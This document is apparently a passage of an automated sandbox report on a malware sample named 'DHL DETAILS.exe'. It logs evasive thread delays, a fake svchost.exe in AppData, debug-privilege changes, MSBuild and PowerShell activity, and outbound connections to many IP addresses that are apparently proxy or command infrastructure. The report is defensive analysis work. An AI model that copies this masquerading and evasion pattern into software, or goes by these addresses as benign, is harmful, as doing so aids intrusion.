                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95391
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 100000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99803
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99641
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99512
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99377
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99194
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 99024
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98755
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98602
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98478
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98187
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 98042
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97910
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97719
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97516
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97359
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97211
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96984
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96848
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96562
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 96383
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 95734
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 95328
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 95172
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 95027
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94906
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94764
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94187
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 94024
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93859
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93687
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93562
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93422
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93307
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 93137
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92975
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92851
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92607
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92460
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92292
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 92131
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91935
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91784
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91632
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91490
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91356
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 91172
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90973
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90765
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90593
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90443
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 90156
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 89640
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 87625
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 87218
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 86890
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 86687
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 86500
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 86343
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 86140
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 85812
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 85668
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 85328
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 85152
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 85025
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84904
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84768
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84515
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84356
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84218
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 84044
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83919
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83625
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83509
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83343
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83230
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 83078
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82936
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82806
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82578
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82437
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82265
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 82095
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81828
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81547
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 81156
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80953
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80725
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80578
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80434
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80234
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 80066
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 79890
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 79672
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 79487
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 78672
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 78422
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 78257
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 78120
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 77967
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 77781
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 77633
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 77482
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 77266
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 77063
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76941
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76750
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76576
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76391
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 76172
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75875
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75609
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75359
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 75076
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74750
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74563
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74374
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 74047
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73719
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73514
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73281
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 73031
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 72777
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 72516
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 72188
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 71625
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 70000
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 69748
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 69453
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 69156
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 68867
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 68469
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 68141
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 67922
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 67700
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 67469
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 67219
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 66969
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 66752
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 66586
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 66359
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 66190
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 66109
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 65875
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 65669
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 65490
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 65203
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 64875
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 64562
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 64312
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 64146
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 63953
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 63797
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 63375
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 63062
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 62859
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 62562
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 62219
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 61974
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 61745
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 61542
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 61359
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 61172
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 60999
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 60814
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 60645
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 60484
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 60322
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 60156
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 59984
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 59774
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 59562
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 59382
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 59203
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 59016
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 58828
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 58500
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 58312
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 58125
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 57937
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 57734
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 57516
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 57297
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 57109
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 56891
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 56672
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 56523
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 56311
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 56125
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 55906
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 55625
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 55444
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 55234
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 54859
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 52391
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 52016
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 51906
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 51703
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 51341
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 51156
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 50984
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 50818
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 50656
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 50459
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 50266
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 50104
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 49859
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96266
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94716
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 93953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 93685
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 93422
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 93297
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                Source: MSBuild.exe, 00000010.00000002.2879177243.0000000006520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\DHL DETAILS.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 93.171.243.253 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.245.159.177 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 24.230.33.96 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.216.51.36 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.162.229.215 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.15.139.15 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 18.135.133.116 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 13.234.24.116 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.61.48.24 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.154.178.243 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 98.71.76.170 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 121.128.194.154 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 207.244.255.174 19770
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 31.43.63.70 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.152.232.217 8181
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.162.135.201 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.95.13.18 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 38.162.15.98 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.90.22.106 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.70.12.54 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.25.210.102 33240
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.136.182.110 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 101.51.121.29 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 138.68.235.51 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.5.77.211 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 63.151.67.7 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.243.177.21 8088
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 46.17.63.166 9480
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 62.171.131.101 25847
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.20.94.93 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.11.95.166 6005
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 123.126.158.50 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.25.230.252 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.116.2.52 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.61.55.138 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 181.57.131.122 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 78.128.81.220 31623
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.47.93.248 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 134.209.29.120 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.162.105.202 8000
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 8.219.228.100 15673
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.11.95.165 5000
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.235.124.143 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 187.216.144.170 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 158.255.215.50 16993
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 207.180.234.220 47476
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 38.252.209.80 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.200.220 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 113.68.62.135 9080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 13.59.156.167 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 64.56.150.102 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 155.50.215.37 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 74.103.66.15 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 168.228.36.22 27234
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.238.228.202 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.56.83.46 8047
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 93.94.90.189 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.47.93.244 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.145.6.32 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.131.203.7 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.37.180.40 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 212.115.232.79 31280
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 211.54.26.187 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 69.61.200.104 36181
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 125.94.219.96 9091
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.190.171.137 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 96.80.235.1 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.158.98.197 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.190.170.254 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 27.123.1.35 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 159.203.104.153 8200
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 169.57.157.148 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 167.250.99.22 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 148.72.23.56 41383
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.99.27.26 8090
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 188.163.170.130 41209
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 146.190.57.169 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 218.75.69.50 57903
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 169.57.157.146 8123
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.131.14.66 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 164.92.86.113 60283
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 119.8.111.196 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 116.242.89.230 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 43.131.248.165 15673
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 140.82.113.3 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.47.93.223 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 60.190.68.154 7302
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 180.180.152.94 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 188.127.236.58 56694
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 35.185.196.38 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.214.102.195 50366
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.93.76.26 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 154.236.179.235 1981
